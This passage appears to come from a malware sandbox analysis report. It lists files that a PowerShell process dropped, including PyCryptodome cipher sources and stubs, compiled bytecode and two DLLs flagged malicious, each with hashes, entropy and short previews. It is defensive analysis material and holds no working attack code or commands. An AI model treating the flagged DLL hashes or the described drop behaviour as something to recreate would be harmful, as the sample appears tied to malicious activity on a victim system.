                                                                                                                                                                                                              Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......blo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7128
                                                                                                                                                                                                              Entropy (8bit):4.870004969011185
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:dKQHvCgXhz1GPoiRxwKIUK9t4A1zRYotKa:YeCg1AhRn9K9t42NYotKa
                                                                                                                                                                                                              MD5:89BE0C40C2479D438C4F3965925EAE7F
                                                                                                                                                                                                              SHA1:8DED4935F0EA56AAEC5E45509E47260E8A193219
                                                                                                                                                                                                              SHA-256:C35476642D7B26E9C71CF16F6FB0E4C44F9CC643A3BF11F1990E38AC07332EED
                                                                                                                                                                                                              SHA-512:D36C095C83FB61AA18C33D0F5699B464212955C776DA1A01FE400B50642B0420E4A0B7E04ECC50BA505F64B1307BB9CA6AEE3FB85ECA8AF80825F3A7358C4380
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES3.py : DES3..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1101
                                                                                                                                                                                                              Entropy (8bit):4.968068738679689
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RENbKAI1QJSzJSVJuJSpJQlJSNINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1AgGWG6SGxOkDRJqJejbFoeR4X
                                                                                                                                                                                                              MD5:DC89ACAAEBEA0CE851FB522E37EF0ACE
                                                                                                                                                                                                              SHA1:0C497C6CD79E70AB8CAB26CE18727FAD20750A59
                                                                                                                                                                                                              SHA-256:3B868D2E9A2B41C27FCAC90E4C0DBAE1634F7198720805FF9F450C4C4D7CB57F
                                                                                                                                                                                                              SHA-512:99F7DBC1CACB3226D916CD744F9FA64787027DBEB39C500788663559D4DDFA985AD8BCF752ED7FC4F65C0499439E867AF9C9F156729D4E671BE4C32A8D036E70
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode,
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8839
                                                                                                                                                                                                              Entropy (8bit):4.800912681448876
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dEFQHvo7uinR7s8L34mb8qko9uNFI3y5xU3a5tLKZCMKesDBDFBIMd3T23jqk9ku:d6QHvg3oFA/Iywx9X96F9ku
                                                                                                                                                                                                              MD5:A71E59688CDC364EAA1F69F7156DC580
                                                                                                                                                                                                              SHA1:180CE4D87F5878F947D0FCAF4AAB1B25A46E0A00
                                                                                                                                                                                                              SHA-256:D4B4FEAE34B0CAB1793ED566D1D578BA0998C7EC78E03150E72E911D5AAD4200
                                                                                                                                                                                                              SHA-512:A17178066CC0B1E291D302AADA51ADD5F432896EA45B787408E5FF08906CC9CBDA39899F7CC594DC33B76AEDB207380CA440F06DCF436B3EF72B0415262D537E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1_OAEP.py : PKCS#1 OAEP..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1218
                                                                                                                                                                                                              Entropy (8bit):4.825103390769477
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1REjQFC19js1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFyw1IttDLteMI5aoJupVjHo
                                                                                                                                                                                                              MD5:D684C8F5065F2BE30D78895F52B3D3DE
                                                                                                                                                                                                              SHA1:9121E5BF5C9B1D9A4BA6BC83690DAB4181BB784A
                                                                                                                                                                                                              SHA-256:6A2570614ACE35D86E25EAB9F2AAAFD351B6B7FF85A9893556FB1A47524E099F
                                                                                                                                                                                                              SHA-512:ADF2D2B86EA419A696CFA5C30E274B9B116B7ED8577C64D91C31BEF21EBA8C30F8041ACE0BD134E43F5FC13E152D34554F741809A67A392631C894006685086B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlg
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7232
                                                                                                                                                                                                              Entropy (8bit):4.877377050556551
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dtFQHvov1sAi70A3ZutH8MKD8LzmodYavD+U8FbPNapwDQtCa:drQHv942ME8H/d8RNuwBa
                                                                                                                                                                                                              MD5:9E3C6EAF6F389D85049E756F8492DFA1
                                                                                                                                                                                                              SHA1:0CC1E1B25396DD1504B154C924CA184600D26F28
                                                                                                                                                                                                              SHA-256:28D6DBD60684F210A8CF662A7AC66BCB978E308B7E2F24F9B579C664C70DF960
                                                                                                                                                                                                              SHA-512:E16862D9F623C40377F149A49061D50C56EAC58D29831288E1DF378D5B60839F92F33832646F3134A237F5B75280C9FE971555F39C7B642D433ED35295CFF5A4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):710
                                                                                                                                                                                                              Entropy (8bit):4.7893819013663546
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYB1mmNkUgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEjJ:1REq7jspT3ENIAlUH8Myje+wqKozuMEt
                                                                                                                                                                                                              MD5:EFF76A3F67661BDE6D9D50BA8E67540F
                                                                                                                                                                                                              SHA1:989514DFB3236DC0D122B27B0430619967FEEBBA
                                                                                                                                                                                                              SHA-256:49DCC3570B0637BF76AFF4BB389AF7E1388AAD93CBFFBF9A1FEB7A3C12186ADF
                                                                                                                                                                                                              SHA-512:7C0D68FC3DEEA336C891632927C4E69EFF397EB4F2449642E8152C3B6B2AF0D077DE023234E3B31D1667AB35460361C79263A4C38C43EC647E188538D38CECBF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Cryptodome.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6536
                                                                                                                                                                                                              Entropy (8bit):4.629114332913442
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:GFQHvo7i49IR+5Jox+lgRXv8NBgQ9Qb3B0NpLPpnwtV8:UQHvcKDRXUNBgHGjRwtV8
                                                                                                                                                                                                              MD5:D91E11F6F88A1E5209F4946F9CEDF0A2
                                                                                                                                                                                                              SHA1:14E8A384D7BAEB7691C33669429FCAB096043367
                                                                                                                                                                                                              SHA-256:27402B67081E01512474926A3F1153C6FCA1AE528038CF7E645C179BCA5FCA1D
                                                                                                                                                                                                              SHA-512:F2D1EE2AE9170742C2841A0D94F82286F113106703C9BD0C517BF6102E13DC42C3FE1C4542B865130ACAA6961AFEFBC9DD4586DB4362275633A2D72A185C7660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/Salsa20.py : Salsa20 stream cipher (http://cr.yp.to/snuffle.html)..#..# Contributed by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):770
                                                                                                                                                                                                              Entropy (8bit):4.753367031924495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                                                                                              MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                                                                                              SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                                                                                              SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                                                                                              SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11264
                                                                                                                                                                                                              Entropy (8bit):4.704418348721006
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:nDzsc9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDj90OcX6gY/7ECFV:Dzs69damqTrpYTst0E5DjPcqgY/79X
                                                                                                                                                                                                              MD5:85F144F57905F68ECBF14552BAB2F070
                                                                                                                                                                                                              SHA1:83A20193E6229EA09DCCAE8890A74DBDD0A76373
                                                                                                                                                                                                              SHA-256:28696C8881D9C9272DE4E54ABE6760CD4C6CB22AD7E3FEABAF6FF313EC9A9EAF
                                                                                                                                                                                                              SHA-512:533EB4073594BFE97850DFF7353439BACD4E19539E247EE00D599F3468E162D2D88C5CA32322772538A73706DF9A6DD14553B35F47C686D2E20D915FAB766BDA
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d...O..e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5348
                                                                                                                                                                                                              Entropy (8bit):4.837696102147451
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:MHDqrYJALrYJHdt3EHGuITiNy6av1ZaVDYyOKgiaiJrJtk3I99m2Ht3HRF29:0qrskrs9t3q/ITESVNi1bk3ITm6tXRY9
                                                                                                                                                                                                              MD5:2801DEB252C32BF76F025CDE403A1AF9
                                                                                                                                                                                                              SHA1:0D2145F2D4CC458056C5ADCB8275C3DA36C64CB8
                                                                                                                                                                                                              SHA-256:87D7CB3A47E3234519A1E01A2B0D007319264E2CB94E54A8864A22FD00165A36
                                                                                                                                                                                                              SHA-512:675BA440D7C4C03B3B388AD7F350949321F7C50289DF3DAA6DD0D763DD269304ED22448989AAA7197D59A59221283861FE3284C6DA0256759313C346CC7A3A47
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2019, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):285
                                                                                                                                                                                                              Entropy (8bit):4.915960101562323
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:1REYBNHKkHb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQkHzlbgHvIY3YyogmvNZRy/O
                                                                                                                                                                                                              MD5:0417C72442B8EC2EF4EF4C6A768824D2
                                                                                                                                                                                                              SHA1:64400FA2D484328EAA347A10CF101504D7552CAB
                                                                                                                                                                                                              SHA-256:F2130E49C75B0660FCFD28D505BEF95FA392CBC2EF636717F49F855546440706
                                                                                                                                                                                                              SHA-512:65B16EB4AADB97C2B6EB52E6DB997AFAAFB4BC16B99DED9BC6956D30BD4373B0EDE496E2C97D63D5DCA6FA53261B446B179D33EED7C2F0AA5D94BC5FE13F2654
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Iterable....from Cryptodome.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13312
                                                                                                                                                                                                              Entropy (8bit):4.968532257508093
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:JF3rugNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDq4wYH/kcX6G:tF/1nb2mhQtkXHTeZ87VDqyMcqgYvEp
                                                                                                                                                                                                              MD5:14A20ED2868F5B3D7DCFEF9363CB1F32
                                                                                                                                                                                                              SHA1:C1F2EF94439F42AA39DCDE1075DEFAC8A6029DC6
                                                                                                                                                                                                              SHA-256:A072631CD1757D5147B5E403D6A96EF94217568D1DC1AE5C67A1892FBF61409E
                                                                                                                                                                                                              SHA-512:33BE8B3733380C3ADFE5D2844819C754FB11FCBC7AA75DA8FBB4D6CEF938E7D3267FBD215B9666DCFA5795D54484360A61DAF193BC75B57C252D44E5F9F0D855
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...P..e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2967
                                                                                                                                                                                                              Entropy (8bit):4.697371690730744
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:AF/1FvgfQq1B5GIDvOQllrRJcC9FVJ79oUZzHfJUPdD9Bd+uTV/H+:m1FvWQq1jGIDvOQllrRJcC9FVJ79XBHZ
                                                                                                                                                                                                              MD5:31C5DE18019727C2DBB04F0A9D2B6CAF
                                                                                                                                                                                                              SHA1:D7EFD7E56BDD5CEDBBF1B1259726FC13A214E630
                                                                                                                                                                                                              SHA-256:C33FF384C31CC8A6D095F1708BB2090B38563B3EE0A127A546ACE5815A104AEC
                                                                                                                                                                                                              SHA-512:0E28065B3E0727739532FD0D9A7752F76EAFA1AC4AF8146A9145320F333C57DDC8A89EAD94458BEF48809F047615C281C058FFA19BF0CD5239F14DC124D1A873
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# A block cipher is instantiated as a combination of:..# 1. A base cipher (such as AES)..# 2. A mode of operation (such as CBC)..#..# Both items are implemented as C modules...#..# The API of #1 is (replace "AES" with the name of the actual cipher):..# - AES_start_operaion(key) --> base_cipher_state..# - AES_encrypt(base_cipher_state, in, out, length)..# - AES_decrypt(base_cipher_state, in, out, length)..# - AES_stop_operation(base_cipher_state)..#..# Where base_cipher_state is AES_State, a struct with BlockBase (set of..# pointers to encrypt/decrypt/stop) followed by cipher-specific data...#..# The API of #2 is (replace "CBC" with the name of the actual mode):..# - CBC_start_operation(base_cipher_state) --> mode_state..# - CBC_encrypt(mode_state, in, out, length)..# - CBC_decrypt(mode_state, in, out, length)..# - CBC_stop_operation(mode_state)..#..# where mode_state is a a pointer to base_cipher_state plus mode-specific data.....import os....from Cryptodome.Cipher._mode_ecb import
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8235
                                                                                                                                                                                                              Entropy (8bit):5.504247600512268
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:nLez5nVn9EXdHXkItPdZ9Qj0lFvgggyNI:nLe9atPFQj0lF3I
                                                                                                                                                                                                              MD5:E2177E54EABAE61FB56400D1DB32E0FB
                                                                                                                                                                                                              SHA1:816357B4E46C9B36D86474C32FFFDCF7A16BDB28
                                                                                                                                                                                                              SHA-256:D344E1AA404E29AAE08006A19E46363C4C14164E025CB39E8A8010C1415710B0
                                                                                                                                                                                                              SHA-512:5F7B7C6E4E5ABBE783E2CB7CDB5B7B4C8361A588BE07631E0460D0DF0C456D4B9D4FE3742C339CFF26AA3887A50482E5CD31AC4C21D69A864ADEBDC4E663F003
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e.#..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.e.........Z...d.Z...e.j6..........................r...e.d.e.j9..................d.d.................Z.d...Z.d...Z.d...Z d.Z!d.Z"y.#.e.$.r...Y...w.x.Y.w.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6660
                                                                                                                                                                                                              Entropy (8bit):5.304447641447283
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:1DMsusqGQ/uT3mv2mmynGdtLAvEjIcgrlYkwofbgggMwP:1d9ESmmynGdtcAf6dTgggVP
                                                                                                                                                                                                              MD5:B3995D6B9F1AE074B09ABAF45ED9EE5A
                                                                                                                                                                                                              SHA1:211B48B912A678A2A676E3255F80859B8436BFE6
                                                                                                                                                                                                              SHA-256:D4FA675C09714D6D948A08550088FAD428438C041B54A46405B262FE30DC3DFD
                                                                                                                                                                                                              SHA-512:04FD82B4A0188C8691C575AE0BAE259DCB25E5879B84A3B4E9D391EFC9EDB3A1A5BCC60D9B86CA4DB9E2E184FAD2A343B1B3D98A59E89D3BF553B56C776869AE
                                                                                                                                                                                                              Malicious:false
